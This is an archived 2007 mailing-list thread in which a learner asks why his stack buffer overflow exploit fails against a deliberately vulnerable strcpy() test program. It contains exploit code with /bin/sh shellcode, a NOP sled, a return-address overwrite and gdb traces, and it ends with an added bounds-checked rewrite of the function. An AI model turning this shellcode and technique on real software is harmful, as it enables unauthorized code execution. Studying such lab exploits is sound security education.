Security Basics mailing list archives
RE: stack overflow help ..
From: gaurav saha <gauravsaha007 () yahoo com>
Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)
Yes, I read it. If I write 4 more bytes, it overwrites the *saved* EIP, right?

========= vul1.c ========
[root@winmitm ~]# more a1.c
f(char *str)
{
    char a[1024];
    strcpy(a,str);
}

main(int argc,char *argv[1])
{
    if(argc>1)
        f(argv[1]);
}
====== end of code ===

My exploit code which I wrote for this was:

===== exploit1.c ======
#include <stdio.h>
#include <string.h>

#define lv_size 1024
#define offset 30+lv_size+8*4

long get_sp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char buffer[lv_size+4*8];
    unsigned long *ptr2 = NULL;
    char *ptr = NULL;
    int i;

    printf("1..\n");
    // Filling with null
    for(i=0;i<lv_size+4*8;i++)
        buffer[i]=0x00;
    ptr=buffer;

    printf("2..\n");
    // Filling with NOPs
    for(i=0;i<lv_size-strlen(execshell);i++)
        *(ptr++)=0x90;

    printf("3..\n");
    // Filling with shellcode
    for(i=0;i<strlen(execshell);i++)
        *(ptr++)=execshell[i];

    printf("4..\n");
    // ptr2 pointing to ptr
    ptr2=(long *)ptr;

    printf("5..\n");
    // Filling with address
    for(i=1;i<2;i++)
        *(ptr2++)=get_sp()+offset;

    execl("/root/vul1", "vul1", buffer, NULL);
}
======== end of my exploit code =======

[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<�^^ 3VV45V4N �3��/bin/sh�>
[root@winmitm ~]#

This is what I get. Can you please guide me on what I am doing wrong?

Thanks
----gaurav

--- "Krpata, Tyler" <tkrpata () bjs com> wrote:
Do an "info frame" in gdb. Remember that you are trying, actually, to overwrite the *saved* EIP value.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of gaurav saha
Sent: Thursday, January 25, 2007 6:27 PM
To: security-basics () securityfocus com
Subject: stack overflow help ..

Hi,

I am new to this stack overflow issue. I am using fc3 (kernel 2.6.12-1.1381). I have modified these few sysctl keys to these values:

kernel.overflowgid = 0
kernel.overflowuid = 0
fs.overflowgid = 0
fs.overflowuid = 0
kernel.randomize_va_space = 0

I am still unable to overwrite EIP.

========= vuln1.c ===========
int main(int argc, char **argv)
{
    char buf[1024];
    strcpy(buf, argv[1]);
    return 0;
}
====== end of vuln1.c =======

$ gcc -ggdb vuln1.c -o v1
$ gdb ./v1
. . . .
(gdb) run `perl -e 'print "A"x1024'`
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1024'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xb5c000
(no debugging symbols found)...(no debugging symbols found)...

Program exited with code 0120.
(gdb) run `perl -e 'print "A"x1028'`
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1028'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x247000
(no debugging symbols found)...(no debugging symbols found)...

Program exited with code 0100.
(gdb) run `perl -e 'print "A"x1036'`
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/gaurav/test/challenges/challenges/buf/v1 `perl -e 'print "A"x1036'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x807000
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x00ac8e0d in __libc_start_main () from /lib/tls/libc.so.6
(gdb) info reg
. .
ebx            0xbdaff4     12431348
esp            0xbffff350   0xbffff350
ebp            0x41414141   0x41414141
esi            0xbffff3d4   -1073744940
edi            0xbffff360   -1073745056
eip            0xac8e0d     0xac8e0d
eflags         0x210286     2163334
. .
(gdb) run `perl -e 'print "A"x1040'`

Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141   0x41414141
eip            0x80483a2    0x80483a2
(gdb) run `perl -e 'print "A"x1044'`

Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141   0x41414141
eip            0x80483a2    0x80483a2
(gdb) run `perl -e 'print "A"x1048'`

Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141   0x41414141
eip            0x80483a2    0x80483a2
(gdb) run `perl -e 'print "A"x1052'`

Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141   0x41414141
eip            0x80483a2    0x80483a2
(gdb) run `perl -e 'print "A"x1056'`

Program received signal SIGSEGV, Segmentation fault.
0x080483a2 in main ()
(gdb) i r
ebp            0x41414141   0x41414141
eip            0x80483a2    0x80483a2

And this keeps continuing, no matter how much I increase it, and I can't figure out what the problem is.

Thanks and adieu
----gaurav
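The whole thread turns on the unbounded strcpy() into a[1024] in f(). As an added example (not code from the thread or from any of its posters), here is that function with the copy bounds-checked, driven with the same argument lengths the original post tried in gdb; handle_arg, would_overflow and accepts_run_of are hypothetical names.

```c
/* Added example, not code from the thread: the f() of vul1.c with the
 * strcpy() replaced by a bounds check. handle_arg, would_overflow and
 * accepts_run_of are hypothetical names. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024   /* same size as a[1024] in the thread's f() */

/* strcpy() in f() stops only at the NUL it finds in str, so a longer
 * argument runs past a[] into the saved EBP and saved return address
 * above it on the stack. The check below refuses such input instead of
 * truncating it silently. Returns 0 when accepted, -1 when rejected. */
int handle_arg(const char *str) {
    char a[BUF_SIZE];
    /* look for the terminator within a[]'s size only; none found = too long */
    const char *nul = memchr(str, '\0', sizeof a);
    if (nul == NULL)
        return -1;
    memcpy(a, str, (size_t)(nul - str) + 1);   /* copies the NUL as well */
    return 0;
}

/* 1 when n non-NUL bytes plus the terminator do not fit in a[BUF_SIZE]. */
int would_overflow(size_t n) {
    return n + 1 > BUF_SIZE;
}

/* Constructs a run of n 'A' bytes, like perl -e 'print "A"x n' in the
 * thread, and returns handle_arg()'s verdict for it (-2 on alloc failure). */
int accepts_run_of(size_t n) {
    char *s = malloc(n + 1);
    if (s == NULL) return -2;
    memset(s, 'A', n);
    s[n] = '\0';
    int rc = handle_arg(s);
    free(s);
    return rc;
}

int main(void) {
    size_t sizes[] = {1023, 1024, 1028, 1036, 1040};  /* lengths tried in gdb */
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("%4zu bytes: strcpy would overflow=%d, checked copy rc=%d\n",
               sizes[i], would_overflow(sizes[i]), accepts_run_of(sizes[i]));
    return 0;
}
```

Note that 1024 'A's already overflow a[1024] by the terminating NUL, which is why the thread's 1024-byte run changes the exit code without a visible crash.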